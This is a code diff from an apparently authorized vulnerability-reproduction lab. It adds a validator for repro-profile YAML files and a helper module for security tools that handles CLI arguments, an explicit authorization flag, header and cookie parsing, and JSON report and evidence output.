+from pathlib import Path +from typing import Any, Dict, List + +from lab.config import ENV_CATALOG_DIR, REPRO_MAP_PATH, REPRO_PROFILES_DIR +from lab.utils import read_yaml + + +def validate_assets() -> List[str]: + errors: List[str] = [] + if not REPRO_MAP_PATH.exists(): + errors.append(f"missing repro map: {REPRO_MAP_PATH}") + if not ENV_CATALOG_DIR.exists(): + errors.append(f"missing environment catalog dir: {ENV_CATALOG_DIR}") + for path in sorted(REPRO_PROFILES_DIR.rglob("*.yaml")): + content = read_yaml(path, default=None) + if not isinstance(content, dict): + errors.append(f"invalid repro profile yaml: {path}") + continue + for field in [ + "profile_id", + "match_rules", + "vuln_family", + "provisioning_mode", + "attack_actions", + "baseline_actions", + "success_criteria", + "cleanup_policy", + "destructive_risk", + "allowed_target_types", + ]: + if field not in content: + errors.append(f"repro profile missing {field}: {path}") + return errors diff --git a/scripts/tool_contract.py b/scripts/tool_contract.py new file mode 100644 index 00000000..b1b9c294 --- /dev/null +++ b/scripts/tool_contract.py @@ -0,0 +1,180 @@ +from __future__ import annotations + +import json +from datetime import datetime, timezone +from pathlib import Path +from typing import Any, Dict, Iterable, List, Optional + + +UTC = timezone.utc +DEFAULT_AUTH_SCOPE = "lab-local, lab-public, authorized-third-party" +DEFAULT_MINIMAL_VALIDATION = "只读探测、最小化注入、可审计回显、可回滚验证。" + + +def now_iso() -> str: + return datetime.now(tz=UTC).replace(microsecond=0).isoformat() + + +def add_common_args(parser, include_input: bool = False, include_network: bool = True) -> None: + parser.add_argument( + "--ack-authorized", + action="store_true", + help="确认目标属于自有资产、测试环境或已明确授权", + ) + parser.add_argument( + "--format", + choices=["text", "json", "ndjson"], + default="text", + help="输出格式,默认 text", + ) + parser.add_argument("--output", help="将结果写入文件") + parser.add_argument("--evidence-dir", help="证据目录,工具会把结构化结果写入其中") + parser.add_argument("--run-id", help="关联的 run bundle ID") + parser.add_argument("--case-id", help="关联的 advisory/case ID") + if include_network: + parser.add_argument( + "--header", + action="append", + default=[], + help="附加请求头,可重复,格式 Name: Value", + ) + parser.add_argument( + "--proxy", + help="调试或实验代理地址,例如 http://127.0.0.1:8080", + ) + parser.add_argument( + "--rate", + type=float, + default=0.0, + help="每秒请求数上限,0 表示不额外限速", + ) + if include_input: + parser.add_argument("--target-file", help="批量目标文件,每行一个目标") + parser.add_argument( + "--stdin", + action="store_true", + help="从标准输入读取目标,每行一个", + ) + + +def ensure_authorized(args, parser) -> None: + if not getattr(args, "ack_authorized", False): + parser.error("必须显式提供 --ack-authorized 以确认目标范围合法") + + +def parse_headers(values: Iterable[str]) -> Dict[str, str]: + headers: Dict[str, str] = {} + for value in values or []: + if ":" not in value: + continue + name, raw = value.split(":", 1) + name = name.strip() + raw = raw.strip() + if not name: + continue + headers[name] = raw + return headers + + +def parse_cookie_string(raw: Optional[str]) -> Dict[str, str]: + cookies: Dict[str, str] = {} + if not raw: + return cookies + for part in raw.split(";"): + if "=" not in part: + continue + name, value = part.split("=", 1) + name = name.strip() + value = value.strip() + if name: + cookies[name] = value + return cookies + + +def read_targets(args, fallback: Optional[str] = None) -> List[str]: + values: List[str] = [] + if fallback: + values.append(fallback) + target_file = getattr(args, "target_file", None) + if target_file: + for line in Path(target_file).read_text(encoding="utf-8").splitlines(): + line = line.strip() + if line and line not in values: + values.append(line) + if getattr(args, "stdin", False): + import sys + + for line in sys.stdin.read().splitlines(): + line = line.strip() + if line and line not in values: + values.append(line) + return values + + +def make_report( + *, + tool: str, + mode: str, + target: str, + status: str, + severity: str, + payload_or_probe: Any, + request_summary: Dict[str, Any], + evidence_refs: List[str], + destructive_risk: str = "low", + minimal_validation: str = DEFAULT_MINIMAL_VALIDATION, + authorization_scope: str = DEFAULT_AUTH_SCOPE, + extra: Optional[Dict[str, Any]] = None, + args: Any = None, +) -> Dict[str, Any]: + payload = { + "tool": tool, + "mode": mode, + "target": target, + "status": status, + "severity": severity, + "timestamp": now_iso(), + "request_summary": request_summary, + "payload_or_probe": payload_or_probe, + "evidence_refs": evidence_refs, + "minimal_validation": minimal_validation, + "authorization_scope": authorization_scope, + "destructive_risk": destructive_risk, + "run_id": getattr(args, "run_id", None) if args else None, + "case_id": getattr(args, "case_id", None) if args else None, + } + if extra: + payload.update(extra) + return payload + + +def write_evidence(args, name: str, data: Any) -> Optional[str]: + evidence_dir = getattr(args, "evidence_dir", None) + if not evidence_dir: + return None + path = Path(evidence_dir) / name + path.parent.mkdir(parents=True, exist_ok=True) + with path.open("w", encoding="utf-8") as handle: + if isinstance(data, str): + handle.write(data.rstrip() + "\n") + else: + json.dump(data, handle, indent=2, ensure_ascii=True, sort_keys=False) + handle.write("\n") + return str(path) + + +def emit_report(args, report: Dict[str, Any], text_lines: Optional[List[str]] = None) -> int: + if args.format == "json": + content = json.dumps(report, indent=2, ensure_ascii=True) + elif args.format == "ndjson": + records = report if isinstance(report, list) else [report] + content = "\n".join(json.dumps(item, ensure_ascii=True) for item in records) + else: + content = "\n".join(text_lines or [json.dumps(report, ensure_ascii=True)]) + + if getattr(args, "output", None): + output = Path(args.output) + output.parent.mkdir(parents=True, exist_ok=True) + output.write_text(content.rstrip() + "\n", encoding="utf-8") + print(content) + return 0